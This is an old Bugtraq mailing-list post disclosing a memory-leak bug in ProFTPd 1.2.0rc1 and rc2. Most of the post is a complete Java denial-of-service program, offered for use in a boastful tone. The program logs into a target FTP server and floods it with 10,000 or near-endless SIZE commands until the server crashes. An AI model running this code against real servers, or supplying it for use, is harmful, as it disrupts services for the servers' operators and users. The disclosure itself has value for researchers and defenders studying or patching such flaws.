Memory leakage in ProFTPd leads to remote DoS (SIZE FTP); (Exploit Code)
Date: Tue, 9 Jan 2001 18:50:53 +0100
From: JeT Li <jet_li_man@yahoo.com>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Memory leakage in ProFTPd leads to remote DoS (SIZE FTP); (Exploit Code)
Hello Bugtraq:
Not so much time ago a ProFTPd remote vulnerability was released:
" ProFTPd has memory leakage bug when it executes the SIZE FTP command. By
calling the FTP command SIZE 5000 times it possible to cause ProFTPd to
consume over 300kB of memory. Exploiting this bug with more SIZE commands
gives us simple DoS attack. Anonymous access is sufficient to use SIZE
commands and to exploit this bug."
I have coded a program that do more than 5000 size's requests to the
server, in order to crash it. ©Why in Java? well I think the procedure is
enough simple to needn't code it in c. In addition, ©Why not in Java? ;-) we
don't need various versions of the program for Linux, BSD, Solaris, etc; there
is an unique program for all the OS and architectures. I wanna bet in favor of
the use of Java to code next generation xploits & DoS ;-)
Vulnerability: Remote DoS in ProFTPd
Requirements: Anonymous or normal user access
Vulnerable systems:
ProFTPd 1.2.0rc1 (Tested)
ProFTPd 1.2.0rc2 (Tested)
And maybe others (1.2.0preX); I have no test this, but I'm sure you can
do it for me ;-)
And now, here is the code:
proftpDoS.java
-----------------------
/* Remote DoS in proFTPd
Code by: JeT-Li -The Wushu Master- jet_li_man@yahoo.com
Well here is a little explanation about the concept of the DoS:
ProFTPd has memory leakage bug when it executes the SIZE FTP command. By
calling the FTP command SIZE 5000 times it possible to cause ProFTPd
to consume over 300kB of memory. Exploiting this bug with more SIZE
commands gives us simple DoS attack. Anonymous access is
sufficient to use SIZE commands and to exploit this bug.
You don't have to give arguments when you execute the program, it will
request you these.
Greets: _kiss_ (the real fucker ;-P); gordoc (no comment, the most
hax man in the w0rld); Perip|o (tibetan mantras for u! ;-P); and all
the ppl of #hackers (not able for cardiac XD).
Vulnerable systems:
ProFTPd 1.2.0rc1 (Tested)
ProFTPd 1.2.0rc2 (Tested)
And maybe others (1.2.0preX); I have no test this, but I'm sure you can
do it for me ;-)
*/
import java.net.*;
import java.io.*;
class TCPconnection {
public TCPconnection (String hostname, int portnumber) throws Exception {
Socket s = doaSocket(hostname, portnumber);
br = new BufferedReader (new InputStreamReader (s.getInputStream()));
ps = new PrintStream (s.getOutputStream());
}
public String readLine() throws Exception {
String s;
try { s = br.readLine(); }
catch (IOException ioe) {
System.out.println("TCP Error ... it's a little hax0r exception ;-)");
throw new Exception ("\nInput Error: I/O Error");
}
return s;
}
public void println(String s) {
ps.println(s);
}
private Socket doaSocket(String hostname, int portnumber) throws Exception {
Socket s = null;
int attempts = 0;
while (s == null && attempts<maxattempts) {
try { s = new Socket(hostname, portnumber); }
catch (UnknownHostException uhe) {
System.err.println("It was no posible to establish the TCP connection.\n" + "Reason: unknown hostname " + hostname + ". Here is the Exception:");
throw new Exception("\nConnection Error: " + "unknown hostname");
}
catch (IOException ioe) {
System.err.println("The connection was not accomplished due to an I/O Error: trying it again ...");
}
attempts++;
}
if (s == null) throw new IOException("\nThe connection was not accomplished due to an I/O Error: trying it again ...");
else return s; }
private final int maxattempts = 5;
private BufferedReader br;
private PrintStream ps;
}
class proftpDoS {
public static void main(String[] arg) throws Exception {
InputStreamReader isr;
BufferedReader tcld;
String hostnamez, username, password, file, s1, option;
int i, j, k;
isr = new InputStreamReader(System.in);
tcld = new BufferedReader(isr);
System.out.println("ProFTPd DoS by JeT-Li -The Wushu Master-");
System.out.println("Code in an attempt to solve Fermat Last's Theoreme");
hostnamez = "";
while (hostnamez.length()==0) {
System.out.print("Please enter the hostname/IP: ");
hostnamez = tcld.readLine(); }
username = "";
while (username.length()==0) {
System.out.print("Enter the username: ");
username = tcld.readLine(); }
password = "";
while (password.length()==0) {
System.out.print("Enter the password for that username: ");
password = tcld.readLine(); }
file = "";
while (file.length()==0) {
System.out.print("Enter a valid filename on the FTP \n(with correct path of course ;-): ");
file = tcld.readLine(); }
System.out.println("Choose one of this options; insert only the NUMBER, i.e.: 1");
System.out.println("1) Request 10000 size's to the server (it may be enough)");
System.out.println("2) \"No pain no gain\" (pseudo-eternal requests, ey it may be harm ;-P)");
System.out.print("Option: ");
option = tcld.readLine();
k = Integer.parseInt(option);
while (!(k==1 || k==2)) {
System.out.print("Option not valid, please try again: ");
option = tcld.readLine();
k = Integer.parseInt(option); }
TCPconnection tc = new TCPconnection(hostnamez, 21);
tc.println("user " + username);
tc.println("pass " + password);
if (k==1) {
for(i=0;i<10000;i++)
tc.println("size " + file); }
else if (k==2) {
for(i=1;i<100;i++)
for(j=2;j<((int)Math.pow(j,i ));j++)
tc.println("size " + file); }
tc.println("quit");
s1 = tc.readLine();
while (s1!=null) {
s1 = tc.readLine();
System.out.println("Attack completed ... as one of my friends says:");
System.out.println("Hack just r0cks ;-)");
}
}
}
-----------------------
Well, that's all folks ;-) Sorry for my poor english, you can send any
dude or whatever you want to: jet_li_man@yahoo.com
JeT Li -The Wushu Master-
__________________________________________________
Do You Yahoo!?
Talk to your friends online with Yahoo! Messenger.
http://im.yahoo.com